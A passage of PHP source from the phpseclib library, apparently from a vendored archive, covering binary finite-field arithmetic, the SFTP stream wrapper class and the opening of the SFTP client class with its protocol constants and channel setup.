http://tools.ietf.org/html/rfc4253#section-6.1 (The Secure Shell (SSH) Transport Layer Protocol) says "implementations SHOULD check that the packet length is reasonable in order for the implementation to avoid denial of service and/or buffer overflow attacks" */ throw new \OutOfBoundsException('Degrees larger than 571 are not supported'); } $val = str_repeat('0', $m) . '1'; foreach ($indices as $index) { $val[$index] = '1'; } $modulo = static::base2ToBase256(strrev($val)); $mStart = 2 * $m - 2; $t = ceil($m / 8); $finalMask = chr((1 << ($m % 8)) - 1); if ($finalMask == "\0") { $finalMask = "\xFF"; } $bitLen = $mStart + 1; $pad = ceil($bitLen / 8); $h = $bitLen & 7; $h = $h ? 8 - $h : 0; $r = rtrim(substr($val, 0, -1), '0'); $u = [static::base2ToBase256(strrev($r))]; for ($i = 1; $i < 8; $i++) { $u[] = static::base2ToBase256(strrev(str_repeat('0', $i) . $r)); } // implements algorithm 2.40 (in section 2.3.5) in "Guide to Elliptic Curve Cryptography" // with W = 8 $reduce = function ($c) use ($u, $mStart, $m, $t, $finalMask, $pad, $h) { $c = str_pad($c, $pad, "\0", STR_PAD_LEFT); for ($i = $mStart; $i >= $m;) { $g = $h >> 3; $mask = $h & 7; $mask = $mask ? 1 << (7 - $mask) : 0x80; for (; $mask > 0; $mask >>= 1, $i--, $h++) { if (ord($c[$g]) & $mask) { $temp = $i - $m; $j = $temp >> 3; $k = $temp & 7; $t1 = $j ? substr($c, 0, -$j) : $c; $length = strlen($t1); if ($length) { $t2 = str_pad($u[$k], $length, "\0", STR_PAD_LEFT); $temp = $t1 ^ $t2; $c = $j ? substr_replace($c, $temp, 0, $length) : $temp; } } } } $c = substr($c, -$t); if (strlen($c) == $t) { $c[0] = $c[0] & $finalMask; } return ltrim($c, "\0"); }; $this->instanceID = self::$instanceCounter++; Integer::setModulo($this->instanceID, $modulo); Integer::setRecurringModuloFunction($this->instanceID, $reduce); $this->randomMax = new BigInteger($modulo, 2); } /** * Returns an instance of a dynamically generated PrimeFieldInteger class * * @param string $num * @return Integer */ public function newInteger($num) { return new Integer($this->instanceID, $num instanceof BigInteger ? $num->toBytes() : $num); } /** * Returns an integer on the finite field between one and the prime modulo * * @return Integer */ public function randomInteger() { static $one; if (!isset($one)) { $one = new BigInteger(1); } return new Integer($this->instanceID, BigInteger::randomRange($one, $this->randomMax)->toBytes()); } /** * Returns the length of the modulo in bytes * * @return int */ public function getLengthInBytes() { return strlen(Integer::getModulo($this->instanceID)); } /** * Returns the length of the modulo in bits * * @return int */ public function getLength() { return strlen(Integer::getModulo($this->instanceID)) << 3; } /** * Converts a base-2 string to a base-256 string * * @param string $x * @param int|null $size * @return string */ public static function base2ToBase256($x, $size = null) { $str = Strings::bits2bin($x); $pad = strlen($x) >> 3; if (strlen($x) & 3) { $pad++; } $str = str_pad($str, $pad, "\0", STR_PAD_LEFT); if (isset($size)) { $str = str_pad($str, $size, "\0", STR_PAD_LEFT); } return $str; } /** * Converts a base-256 string to a base-2 string * * @param string $x * @return string */ public static function base256ToBase2($x) { if (function_exists('gmp_import')) { return gmp_strval(gmp_import($x), 2); } return Strings::bin2bits($x); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Net/SFTP/Stream.php000064400000051445147600400120021230 0ustar00 * @copyright 2013 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Net\SFTP; use phpseclib3\Crypt\Common\PrivateKey; use phpseclib3\Net\SFTP; use phpseclib3\Net\SSH2; /** * SFTP Stream Wrapper * * @author Jim Wigginton */ class Stream { /** * SFTP instances * * Rather than re-create the connection we re-use instances if possible * * @var array */ public static $instances; /** * SFTP instance * * @var object */ private $sftp; /** * Path * * @var string */ private $path; /** * Mode * * @var string */ private $mode; /** * Position * * @var int */ private $pos; /** * Size * * @var int */ private $size; /** * Directory entries * * @var array */ private $entries; /** * EOF flag * * @var bool */ private $eof; /** * Context resource * * Technically this needs to be publicly accessible so PHP can set it directly * * @var resource */ public $context; /** * Notification callback function * * @var callable */ private $notification; /** * Registers this class as a URL wrapper. * * @param string $protocol The wrapper name to be registered. * @return bool True on success, false otherwise. */ public static function register($protocol = 'sftp') { if (in_array($protocol, stream_get_wrappers(), true)) { return false; } return stream_wrapper_register($protocol, get_called_class()); } /** * The Constructor * */ public function __construct() { if (defined('NET_SFTP_STREAM_LOGGING')) { echo "__construct()\r\n"; } } /** * Path Parser * * Extract a path from a URI and actually connect to an SSH server if appropriate * * If "notification" is set as a context parameter the message code for successful login is * NET_SSH2_MSG_USERAUTH_SUCCESS. For a failed login it's NET_SSH2_MSG_USERAUTH_FAILURE. * * @param string $path * @return string */ protected function parse_path($path) { $orig = $path; extract(parse_url($path) + ['port' => 22]); if (isset($query)) { $path .= '?' . $query; } elseif (preg_match('/(\?|\?#)$/', $orig)) { $path .= '?'; } if (isset($fragment)) { $path .= '#' . $fragment; } elseif ($orig[strlen($orig) - 1] == '#') { $path .= '#'; } if (!isset($host)) { return false; } if (isset($this->context)) { $context = stream_context_get_params($this->context); if (isset($context['notification'])) { $this->notification = $context['notification']; } } if (preg_match('/^{[a-z0-9]+}$/i', $host)) { $host = SSH2::getConnectionByResourceId($host); if ($host === false) { return false; } $this->sftp = $host; } else { if (isset($this->context)) { $context = stream_context_get_options($this->context); } if (isset($context[$scheme]['session'])) { $sftp = $context[$scheme]['session']; } if (isset($context[$scheme]['sftp'])) { $sftp = $context[$scheme]['sftp']; } if (isset($sftp) && $sftp instanceof SFTP) { $this->sftp = $sftp; return $path; } if (isset($context[$scheme]['username'])) { $user = $context[$scheme]['username']; } if (isset($context[$scheme]['password'])) { $pass = $context[$scheme]['password']; } if (isset($context[$scheme]['privkey']) && $context[$scheme]['privkey'] instanceof PrivateKey) { $pass = $context[$scheme]['privkey']; } if (!isset($user) || !isset($pass)) { return false; } // casting $pass to a string is necessary in the event that it's a \phpseclib3\Crypt\RSA object if (isset(self::$instances[$host][$port][$user][(string) $pass])) { $this->sftp = self::$instances[$host][$port][$user][(string) $pass]; } else { $this->sftp = new SFTP($host, $port); $this->sftp->disableStatCache(); if (isset($this->notification) && is_callable($this->notification)) { /* if !is_callable($this->notification) we could do this: user_error('fopen(): failed to call user notifier', E_USER_WARNING); the ftp wrapper gives errors like that when the notifier isn't callable. i've opted not to do that, however, since the ftp wrapper gives the line on which the fopen occurred as the line number - not the line that the user_error is on. */ call_user_func($this->notification, STREAM_NOTIFY_CONNECT, STREAM_NOTIFY_SEVERITY_INFO, '', 0, 0, 0); call_user_func($this->notification, STREAM_NOTIFY_AUTH_REQUIRED, STREAM_NOTIFY_SEVERITY_INFO, '', 0, 0, 0); if (!$this->sftp->login($user, $pass)) { call_user_func($this->notification, STREAM_NOTIFY_AUTH_RESULT, STREAM_NOTIFY_SEVERITY_ERR, 'Login Failure', NET_SSH2_MSG_USERAUTH_FAILURE, 0, 0); return false; } call_user_func($this->notification, STREAM_NOTIFY_AUTH_RESULT, STREAM_NOTIFY_SEVERITY_INFO, 'Login Success', NET_SSH2_MSG_USERAUTH_SUCCESS, 0, 0); } else { if (!$this->sftp->login($user, $pass)) { return false; } } self::$instances[$host][$port][$user][(string) $pass] = $this->sftp; } } return $path; } /** * Opens file or URL * * @param string $path * @param string $mode * @param int $options * @param string $opened_path * @return bool */ private function _stream_open($path, $mode, $options, &$opened_path) { $path = $this->parse_path($path); if ($path === false) { return false; } $this->path = $path; $this->size = $this->sftp->filesize($path); $this->mode = preg_replace('#[bt]$#', '', $mode); $this->eof = false; if ($this->size === false) { if ($this->mode[0] == 'r') { return false; } else { $this->sftp->touch($path); $this->size = 0; } } else { switch ($this->mode[0]) { case 'x': return false; case 'w': $this->sftp->truncate($path, 0); $this->size = 0; } } $this->pos = $this->mode[0] != 'a' ? 0 : $this->size; return true; } /** * Read from stream * * @param int $count * @return mixed */ private function _stream_read($count) { switch ($this->mode) { case 'w': case 'a': case 'x': case 'c': return false; } // commented out because some files - eg. /dev/urandom - will say their size is 0 when in fact it's kinda infinite //if ($this->pos >= $this->size) { // $this->eof = true; // return false; //} $result = $this->sftp->get($this->path, false, $this->pos, $count); if (isset($this->notification) && is_callable($this->notification)) { if ($result === false) { call_user_func($this->notification, STREAM_NOTIFY_FAILURE, STREAM_NOTIFY_SEVERITY_ERR, $this->sftp->getLastSFTPError(), NET_SFTP_OPEN, 0, 0); return 0; } // seems that PHP calls stream_read in 8k chunks call_user_func($this->notification, STREAM_NOTIFY_PROGRESS, STREAM_NOTIFY_SEVERITY_INFO, '', 0, strlen($result), $this->size); } if (empty($result)) { // ie. false or empty string $this->eof = true; return false; } $this->pos += strlen($result); return $result; } /** * Write to stream * * @param string $data * @return int|false */ private function _stream_write($data) { switch ($this->mode) { case 'r': return false; } $result = $this->sftp->put($this->path, $data, SFTP::SOURCE_STRING, $this->pos); if (isset($this->notification) && is_callable($this->notification)) { if (!$result) { call_user_func($this->notification, STREAM_NOTIFY_FAILURE, STREAM_NOTIFY_SEVERITY_ERR, $this->sftp->getLastSFTPError(), NET_SFTP_OPEN, 0, 0); return 0; } // seems that PHP splits up strings into 8k blocks before calling stream_write call_user_func($this->notification, STREAM_NOTIFY_PROGRESS, STREAM_NOTIFY_SEVERITY_INFO, '', 0, strlen($data), strlen($data)); } if ($result === false) { return false; } $this->pos += strlen($data); if ($this->pos > $this->size) { $this->size = $this->pos; } $this->eof = false; return strlen($data); } /** * Retrieve the current position of a stream * * @return int */ private function _stream_tell() { return $this->pos; } /** * Tests for end-of-file on a file pointer * * In my testing there are four classes functions that normally effect the pointer: * fseek, fputs / fwrite, fgets / fread and ftruncate. * * Only fgets / fread, however, results in feof() returning true. do fputs($fp, 'aaa') on a blank file and feof() * will return false. do fread($fp, 1) and feof() will then return true. do fseek($fp, 10) on ablank file and feof() * will return false. do fread($fp, 1) and feof() will then return true. * * @return bool */ private function _stream_eof() { return $this->eof; } /** * Seeks to specific location in a stream * * @param int $offset * @param int $whence * @return bool */ private function _stream_seek($offset, $whence) { switch ($whence) { case SEEK_SET: if ($offset < 0) { return false; } break; case SEEK_CUR: $offset += $this->pos; break; case SEEK_END: $offset += $this->size; } $this->pos = $offset; $this->eof = false; return true; } /** * Change stream options * * @param string $path * @param int $option * @param mixed $var * @return bool */ private function _stream_metadata($path, $option, $var) { $path = $this->parse_path($path); if ($path === false) { return false; } // stream_metadata was introduced in PHP 5.4.0 but as of 5.4.11 the constants haven't been defined // see http://www.php.net/streamwrapper.stream-metadata and https://bugs.php.net/64246 // and https://github.com/php/php-src/blob/master/main/php_streams.h#L592 switch ($option) { case 1: // PHP_STREAM_META_TOUCH $time = isset($var[0]) ? $var[0] : null; $atime = isset($var[1]) ? $var[1] : null; return $this->sftp->touch($path, $time, $atime); case 2: // PHP_STREAM_OWNER_NAME case 3: // PHP_STREAM_GROUP_NAME return false; case 4: // PHP_STREAM_META_OWNER return $this->sftp->chown($path, $var); case 5: // PHP_STREAM_META_GROUP return $this->sftp->chgrp($path, $var); case 6: // PHP_STREAM_META_ACCESS return $this->sftp->chmod($path, $var) !== false; } } /** * Retrieve the underlaying resource * * @param int $cast_as * @return resource */ private function _stream_cast($cast_as) { return $this->sftp->fsock; } /** * Advisory file locking * * @param int $operation * @return bool */ private function _stream_lock($operation) { return false; } /** * Renames a file or directory * * Attempts to rename oldname to newname, moving it between directories if necessary. * If newname exists, it will be overwritten. This is a departure from what \phpseclib3\Net\SFTP * does. * * @param string $path_from * @param string $path_to * @return bool */ private function _rename($path_from, $path_to) { $path1 = parse_url($path_from); $path2 = parse_url($path_to); unset($path1['path'], $path2['path']); if ($path1 != $path2) { return false; } $path_from = $this->parse_path($path_from); $path_to = parse_url($path_to); if ($path_from === false) { return false; } $path_to = $path_to['path']; // the $component part of parse_url() was added in PHP 5.1.2 // "It is an error if there already exists a file with the name specified by newpath." // -- http://tools.ietf.org/html/draft-ietf-secsh-filexfer-02#section-6.5 if (!$this->sftp->rename($path_from, $path_to)) { if ($this->sftp->stat($path_to)) { return $this->sftp->delete($path_to, true) && $this->sftp->rename($path_from, $path_to); } return false; } return true; } /** * Open directory handle * * The only $options is "whether or not to enforce safe_mode (0x04)". Since safe mode was deprecated in 5.3 and * removed in 5.4 I'm just going to ignore it. * * Also, nlist() is the best that this function is realistically going to be able to do. When an SFTP client * sends a SSH_FXP_READDIR packet you don't generally get info on just one file but on multiple files. Quoting * the SFTP specs: * * The SSH_FXP_NAME response has the following format: * * uint32 id * uint32 count * repeats count times: * string filename * string longname * ATTRS attrs * * @param string $path * @param int $options * @return bool */ private function _dir_opendir($path, $options) { $path = $this->parse_path($path); if ($path === false) { return false; } $this->pos = 0; $this->entries = $this->sftp->nlist($path); return $this->entries !== false; } /** * Read entry from directory handle * * @return mixed */ private function _dir_readdir() { if (isset($this->entries[$this->pos])) { return $this->entries[$this->pos++]; } return false; } /** * Rewind directory handle * * @return bool */ private function _dir_rewinddir() { $this->pos = 0; return true; } /** * Close directory handle * * @return bool */ private function _dir_closedir() { return true; } /** * Create a directory * * Only valid $options is STREAM_MKDIR_RECURSIVE * * @param string $path * @param int $mode * @param int $options * @return bool */ private function _mkdir($path, $mode, $options) { $path = $this->parse_path($path); if ($path === false) { return false; } return $this->sftp->mkdir($path, $mode, $options & STREAM_MKDIR_RECURSIVE); } /** * Removes a directory * * Only valid $options is STREAM_MKDIR_RECURSIVE per , however, * does not have a $recursive parameter as mkdir() does so I don't know how * STREAM_MKDIR_RECURSIVE is supposed to be set. Also, when I try it out with rmdir() I get 8 as * $options. What does 8 correspond to? * * @param string $path * @param int $options * @return bool */ private function _rmdir($path, $options) { $path = $this->parse_path($path); if ($path === false) { return false; } return $this->sftp->rmdir($path); } /** * Flushes the output * * See . Always returns true because \phpseclib3\Net\SFTP doesn't cache stuff before writing * * @return bool */ private function _stream_flush() { return true; } /** * Retrieve information about a file resource * * @return mixed */ private function _stream_stat() { $results = $this->sftp->stat($this->path); if ($results === false) { return false; } return $results; } /** * Delete a file * * @param string $path * @return bool */ private function _unlink($path) { $path = $this->parse_path($path); if ($path === false) { return false; } return $this->sftp->delete($path, false); } /** * Retrieve information about a file * * Ignores the STREAM_URL_STAT_QUIET flag because the entirety of \phpseclib3\Net\SFTP\Stream is quiet by default * might be worthwhile to reconstruct bits 12-16 (ie. the file type) if mode doesn't have them but we'll * cross that bridge when and if it's reached * * @param string $path * @param int $flags * @return mixed */ private function _url_stat($path, $flags) { $path = $this->parse_path($path); if ($path === false) { return false; } $results = $flags & STREAM_URL_STAT_LINK ? $this->sftp->lstat($path) : $this->sftp->stat($path); if ($results === false) { return false; } return $results; } /** * Truncate stream * * @param int $new_size * @return bool */ private function _stream_truncate($new_size) { if (!$this->sftp->truncate($this->path, $new_size)) { return false; } $this->eof = false; $this->size = $new_size; return true; } /** * Change stream options * * STREAM_OPTION_WRITE_BUFFER isn't supported for the same reason stream_flush isn't. * The other two aren't supported because of limitations in \phpseclib3\Net\SFTP. * * @param int $option * @param int $arg1 * @param int $arg2 * @return bool */ private function _stream_set_option($option, $arg1, $arg2) { return false; } /** * Close an resource * */ private function _stream_close() { } /** * __call Magic Method * * When you're utilizing an SFTP stream you're not calling the methods in this class directly - PHP is calling them for you. * Which kinda begs the question... what methods is PHP calling and what parameters is it passing to them? This function * lets you figure that out. * * If NET_SFTP_STREAM_LOGGING is defined all calls will be output on the screen and then (regardless of whether or not * NET_SFTP_STREAM_LOGGING is enabled) the parameters will be passed through to the appropriate method. * * @param string $name * @param array $arguments * @return mixed */ public function __call($name, array $arguments) { if (defined('NET_SFTP_STREAM_LOGGING')) { echo $name . '('; $last = count($arguments) - 1; foreach ($arguments as $i => $argument) { var_export($argument); if ($i != $last) { echo ','; } } echo ")\r\n"; } $name = '_' . $name; if (!method_exists($this, $name)) { return false; } return $this->$name(...$arguments); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Net/SFTP.php000064400000352020147600400120017766 0ustar00 * login('username', 'password')) { * exit('Login Failed'); * } * * echo $sftp->pwd() . "\r\n"; * $sftp->put('filename.ext', 'hello, world!'); * print_r($sftp->nlist()); * ?> * * * @author Jim Wigginton * @copyright 2009 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Net; use phpseclib3\Common\Functions\Strings; use phpseclib3\Exception\FileNotFoundException; /** * Pure-PHP implementations of SFTP. * * @author Jim Wigginton */ class SFTP extends SSH2 { /** * SFTP channel constant * * \phpseclib3\Net\SSH2::exec() uses 0 and \phpseclib3\Net\SSH2::read() / \phpseclib3\Net\SSH2::write() use 1. * * @see \phpseclib3\Net\SSH2::send_channel_packet() * @see \phpseclib3\Net\SSH2::get_channel_packet() */ const CHANNEL = 0x100; /** * Reads data from a local file. * * @see \phpseclib3\Net\SFTP::put() */ const SOURCE_LOCAL_FILE = 1; /** * Reads data from a string. * * @see \phpseclib3\Net\SFTP::put() */ // this value isn't really used anymore but i'm keeping it reserved for historical reasons const SOURCE_STRING = 2; /** * Reads data from callback: * function callback($length) returns string to proceed, null for EOF * * @see \phpseclib3\Net\SFTP::put() */ const SOURCE_CALLBACK = 16; /** * Resumes an upload * * @see \phpseclib3\Net\SFTP::put() */ const RESUME = 4; /** * Append a local file to an already existing remote file * * @see \phpseclib3\Net\SFTP::put() */ const RESUME_START = 8; /** * Packet Types * * @see self::__construct() * @var array * @access private */ private static $packet_types = []; /** * Status Codes * * @see self::__construct() * @var array * @access private */ private static $status_codes = []; /** @var array */ private static $attributes; /** @var array */ private static $open_flags; /** @var array */ private static $open_flags5; /** @var array */ private static $file_types; /** * The Request ID * * The request ID exists in the off chance that a packet is sent out-of-order. Of course, this library doesn't support * concurrent actions, so it's somewhat academic, here. * * @var boolean * @see self::_send_sftp_packet() */ private $use_request_id = false; /** * The Packet Type * * The request ID exists in the off chance that a packet is sent out-of-order. Of course, this library doesn't support * concurrent actions, so it's somewhat academic, here. * * @var int * @see self::_get_sftp_packet() */ private $packet_type = -1; /** * Packet Buffer * * @var string * @see self::_get_sftp_packet() */ private $packet_buffer = ''; /** * Extensions supported by the server * * @var array * @see self::_initChannel() */ private $extensions = []; /** * Server SFTP version * * @var int * @see self::_initChannel() */ private $version; /** * Default Server SFTP version * * @var int * @see self::_initChannel() */ private $defaultVersion; /** * Preferred SFTP version * * @var int * @see self::_initChannel() */ private $preferredVersion = 3; /** * Current working directory * * @var string|bool * @see self::realpath() * @see self::chdir() */ private $pwd = false; /** * Packet Type Log * * @see self::getLog() * @var array */ private $packet_type_log = []; /** * Packet Log * * @see self::getLog() * @var array */ private $packet_log = []; /** * Real-time log file pointer * * @see self::_append_log() * @var resource|closed-resource */ private $realtime_log_file; /** * Real-time log file size * * @see self::_append_log() * @var int */ private $realtime_log_size; /** * Real-time log file wrap boolean * * @see self::_append_log() * @var bool */ private $realtime_log_wrap; /** * Current log size * * Should never exceed self::LOG_MAX_SIZE * * @var int */ private $log_size; /** * Error information * * @see self::getSFTPErrors() * @see self::getLastSFTPError() * @var array */ private $sftp_errors = []; /** * Stat Cache * * Rather than always having to open a directory and close it immediately there after to see if a file is a directory * we'll cache the results. * * @see self::_update_stat_cache() * @see self::_remove_from_stat_cache() * @see self::_query_stat_cache() * @var array */ private $stat_cache = []; /** * Max SFTP Packet Size * * @see self::__construct() * @see self::get() * @var int */ private $max_sftp_packet; /** * Stat Cache Flag * * @see self::disableStatCache() * @see self::enableStatCache() * @var bool */ private $use_stat_cache = true; /** * Sort Options * * @see self::_comparator() * @see self::setListOrder() * @var array */ protected $sortOptions = []; /** * Canonicalization Flag * * Determines whether or not paths should be canonicalized before being * passed on to the remote server. * * @see self::enablePathCanonicalization() * @see self::disablePathCanonicalization() * @see self::realpath() * @var bool */ private $canonicalize_paths = true; /** * Request Buffers * * @see self::_get_sftp_packet() * @var array */ private $requestBuffer = []; /** * Preserve timestamps on file downloads / uploads * * @see self::get() * @see self::put() * @var bool */ private $preserveTime = false; /** * Arbitrary Length Packets Flag * * Determines whether or not packets of any length should be allowed, * in cases where the server chooses the packet length (such as * directory listings). By default, packets are only allowed to be * 256 * 1024 bytes (SFTP_MAX_MSG_LENGTH from OpenSSH's sftp-common.h) * * @see self::enableArbitraryLengthPackets() * @see self::_get_sftp_packet() * @var bool */ private $allow_arbitrary_length_packets = false; /** * Was the last packet due to the channels being closed or not? * * @see self::get() * @see self::get_sftp_packet() * @var bool */ private $channel_close = false; /** * Has the SFTP channel been partially negotiated? * * @var bool */ private $partial_init = false; /** * Default Constructor. * * Connects to an SFTP server * * $host can either be a string, representing the host, or a stream resource. * * @param mixed $host * @param int $port * @param int $timeout */ public function __construct($host, $port = 22, $timeout = 10) { parent::__construct($host, $port, $timeout); $this->max_sftp_packet = 1 << 15; if (empty(self::$packet_types)) { self::$packet_types = [ 1 => 'NET_SFTP_INIT', 2 => 'NET_SFTP_VERSION', 3 => 'NET_SFTP_OPEN', 4 => 'NET_SFTP_CLOSE', 5 => 'NET_SFTP_READ', 6 => 'NET_SFTP_WRITE', 7 => 'NET_SFTP_LSTAT', 9 => 'NET_SFTP_SETSTAT', 10 => 'NET_SFTP_FSETSTAT', 11 => 'NET_SFTP_OPENDIR', 12 => 'NET_SFTP_READDIR', 13 => 'NET_SFTP_REMOVE', 14 => 'NET_SFTP_MKDIR', 15 => 'NET_SFTP_RMDIR', 16 => 'NET_SFTP_REALPATH', 17 => 'NET_SFTP_STAT', 18 => 'NET_SFTP_RENAME', 19 => 'NET_SFTP_READLINK', 20 => 'NET_SFTP_SYMLINK', 21 => 'NET_SFTP_LINK', 101 => 'NET_SFTP_STATUS', 102 => 'NET_SFTP_HANDLE', 103 => 'NET_SFTP_DATA', 104 => 'NET_SFTP_NAME', 105 => 'NET_SFTP_ATTRS', 200 => 'NET_SFTP_EXTENDED' ]; self::$status_codes = [ 0 => 'NET_SFTP_STATUS_OK', 1 => 'NET_SFTP_STATUS_EOF', 2 => 'NET_SFTP_STATUS_NO_SUCH_FILE', 3 => 'NET_SFTP_STATUS_PERMISSION_DENIED', 4 => 'NET_SFTP_STATUS_FAILURE', 5 => 'NET_SFTP_STATUS_BAD_MESSAGE', 6 => 'NET_SFTP_STATUS_NO_CONNECTION', 7 => 'NET_SFTP_STATUS_CONNECTION_LOST', 8 => 'NET_SFTP_STATUS_OP_UNSUPPORTED', 9 => 'NET_SFTP_STATUS_INVALID_HANDLE', 10 => 'NET_SFTP_STATUS_NO_SUCH_PATH', 11 => 'NET_SFTP_STATUS_FILE_ALREADY_EXISTS', 12 => 'NET_SFTP_STATUS_WRITE_PROTECT', 13 => 'NET_SFTP_STATUS_NO_MEDIA', 14 => 'NET_SFTP_STATUS_NO_SPACE_ON_FILESYSTEM', 15 => 'NET_SFTP_STATUS_QUOTA_EXCEEDED', 16 => 'NET_SFTP_STATUS_UNKNOWN_PRINCIPAL', 17 => 'NET_SFTP_STATUS_LOCK_CONFLICT', 18 => 'NET_SFTP_STATUS_DIR_NOT_EMPTY', 19 => 'NET_SFTP_STATUS_NOT_A_DIRECTORY', 20 => 'NET_SFTP_STATUS_INVALID_FILENAME', 21 => 'NET_SFTP_STATUS_LINK_LOOP', 22 => 'NET_SFTP_STATUS_CANNOT_DELETE', 23 => 'NET_SFTP_STATUS_INVALID_PARAMETER', 24 => 'NET_SFTP_STATUS_FILE_IS_A_DIRECTORY', 25 => 'NET_SFTP_STATUS_BYTE_RANGE_LOCK_CONFLICT', 26 => 'NET_SFTP_STATUS_BYTE_RANGE_LOCK_REFUSED', 27 => 'NET_SFTP_STATUS_DELETE_PENDING', 28 => 'NET_SFTP_STATUS_FILE_CORRUPT', 29 => 'NET_SFTP_STATUS_OWNER_INVALID', 30 => 'NET_SFTP_STATUS_GROUP_INVALID', 31 => 'NET_SFTP_STATUS_NO_MATCHING_BYTE_RANGE_LOCK' ]; // http://tools.ietf.org/html/draft-ietf-secsh-filexfer-13#section-7.1 // the order, in this case, matters quite a lot - see \phpseclib3\Net\SFTP::_parseAttributes() to understand why self::$attributes = [ 0x00000001 => 'NET_SFTP_ATTR_SIZE', 0x00000002 => 'NET_SFTP_ATTR_UIDGID', // defined in SFTPv3, removed in SFTPv4+ 0x00000080 => 'NET_SFTP_ATTR_OWNERGROUP', // defined in SFTPv4+ 0x00000004 => 'NET_SFTP_ATTR_PERMISSIONS', 0x00000008 => 'NET_SFTP_ATTR_ACCESSTIME', 0x00000010 => 'NET_SFTP_ATTR_CREATETIME', // SFTPv4+ 0x00000020 => 'NET_SFTP_ATTR_MODIFYTIME', 0x00000040 => 'NET_SFTP_ATTR_ACL', 0x00000100 => 'NET_SFTP_ATTR_SUBSECOND_TIMES', 0x00000200 => 'NET_SFTP_ATTR_BITS', // SFTPv5+ 0x00000400 => 'NET_SFTP_ATTR_ALLOCATION_SIZE', // SFTPv6+ 0x00000800 => 'NET_SFTP_ATTR_TEXT_HINT', 0x00001000 => 'NET_SFTP_ATTR_MIME_TYPE', 0x00002000 => 'NET_SFTP_ATTR_LINK_COUNT', 0x00004000 => 'NET_SFTP_ATTR_UNTRANSLATED_NAME', 0x00008000 => 'NET_SFTP_ATTR_CTIME', // 0x80000000 will yield a floating point on 32-bit systems and converting floating points to integers // yields inconsistent behavior depending on how php is compiled. so we left shift -1 (which, in // two's compliment, consists of all 1 bits) by 31. on 64-bit systems this'll yield 0xFFFFFFFF80000000. // that's not a problem, however, and 'anded' and a 32-bit number, as all the leading 1 bits are ignored. (PHP_INT_SIZE == 4 ? (-1 << 31) : 0x80000000) => 'NET_SFTP_ATTR_EXTENDED' ]; // http://tools.ietf.org/html/draft-ietf-secsh-filexfer-04#section-6.3 // the flag definitions change somewhat in SFTPv5+. if SFTPv5+ support is added to this library, maybe name // the array for that $this->open5_flags and similarly alter the constant names. self::$open_flags = [ 0x00000001 => 'NET_SFTP_OPEN_READ', 0x00000002 => 'NET_SFTP_OPEN_WRITE', 0x00000004 => 'NET_SFTP_OPEN_APPEND', 0x00000008 => 'NET_SFTP_OPEN_CREATE', 0x00000010 => 'NET_SFTP_OPEN_TRUNCATE', 0x00000020 => 'NET_SFTP_OPEN_EXCL', 0x00000040 => 'NET_SFTP_OPEN_TEXT' // defined in SFTPv4 ]; // SFTPv5+ changed the flags up: // https://datatracker.ietf.org/doc/html/draft-ietf-secsh-filexfer-13#section- self::$open_flags5 = [ // when SSH_FXF_ACCESS_DISPOSITION is a 3 bit field that controls how the file is opened 0x00000000 => 'NET_SFTP_OPEN_CREATE_NEW', 0x00000001 => 'NET_SFTP_OPEN_CREATE_TRUNCATE', 0x00000002 => 'NET_SFTP_OPEN_OPEN_EXISTING', 0x00000003 => 'NET_SFTP_OPEN_OPEN_OR_CREATE', 0x00000004 => 'NET_SFTP_OPEN_TRUNCATE_EXISTING', // the rest of the flags are not supported 0x00000008 => 'NET_SFTP_OPEN_APPEND_DATA', // "the offset field of SS_FXP_WRITE requests is ignored" 0x00000010 => 'NET_SFTP_OPEN_APPEND_DATA_ATOMIC', 0x00000020 => 'NET_SFTP_OPEN_TEXT_MODE', 0x00000040 => 'NET_SFTP_OPEN_BLOCK_READ', 0x00000080 => 'NET_SFTP_OPEN_BLOCK_WRITE', 0x00000100 => 'NET_SFTP_OPEN_BLOCK_DELETE', 0x00000200 => 'NET_SFTP_OPEN_BLOCK_ADVISORY', 0x00000400 => 'NET_SFTP_OPEN_NOFOLLOW', 0x00000800 => 'NET_SFTP_OPEN_DELETE_ON_CLOSE', 0x00001000 => 'NET_SFTP_OPEN_ACCESS_AUDIT_ALARM_INFO', 0x00002000 => 'NET_SFTP_OPEN_ACCESS_BACKUP', 0x00004000 => 'NET_SFTP_OPEN_BACKUP_STREAM', 0x00008000 => 'NET_SFTP_OPEN_OVERRIDE_OWNER', ]; // http://tools.ietf.org/html/draft-ietf-secsh-filexfer-04#section-5.2 // see \phpseclib3\Net\SFTP::_parseLongname() for an explanation self::$file_types = [ 1 => 'NET_SFTP_TYPE_REGULAR', 2 => 'NET_SFTP_TYPE_DIRECTORY', 3 => 'NET_SFTP_TYPE_SYMLINK', 4 => 'NET_SFTP_TYPE_SPECIAL', 5 => 'NET_SFTP_TYPE_UNKNOWN', // the following types were first defined for use in SFTPv5+ // http://tools.ietf.org/html/draft-ietf-secsh-filexfer-05#section-5.2 6 => 'NET_SFTP_TYPE_SOCKET', 7 => 'NET_SFTP_TYPE_CHAR_DEVICE', 8 => 'NET_SFTP_TYPE_BLOCK_DEVICE', 9 => 'NET_SFTP_TYPE_FIFO' ]; self::define_array( self::$packet_types, self::$status_codes, self::$attributes, self::$open_flags, self::$open_flags5, self::$file_types ); } if (!defined('NET_SFTP_QUEUE_SIZE')) { define('NET_SFTP_QUEUE_SIZE', 32); } if (!defined('NET_SFTP_UPLOAD_QUEUE_SIZE')) { define('NET_SFTP_UPLOAD_QUEUE_SIZE', 1024); } } /** * Check a few things before SFTP functions are called * * @return bool */ private function precheck() { if (!($this->bitmap & SSH2::MASK_LOGIN)) { return false; } if ($this->pwd === false) { return $this->init_sftp_connection(); } return true; } /** * Partially initialize an SFTP connection * * @throws \UnexpectedValueException on receipt of unexpected packets * @return bool */ private function partial_init_sftp_connection() { $response = $this->openChannel(self::CHANNEL, true); if ($response === true && $this->isTimeout()) { return false; } $packet = Strings::packSSH2( 'CNsbs', NET_SSH2_MSG_CHANNEL_REQUEST, $this->server_channels[self::CHANNEL], 'subsystem', true, 'sftp' ); $this->send_binary_packet($packet); $this->channel_status[self::CHANNEL] = NET_SSH2_MSG_CHANNEL_REQUEST; $response = $this->get_channel_packet(self::CHANNEL, true); if ($response === false) { // from PuTTY's psftp.exe $command = "test -x /usr/lib/sftp-server && exec /usr/lib/sftp-server\n" . "test -x /usr/local/lib/sftp-server && exec /usr/local/lib/sftp-server\n" . 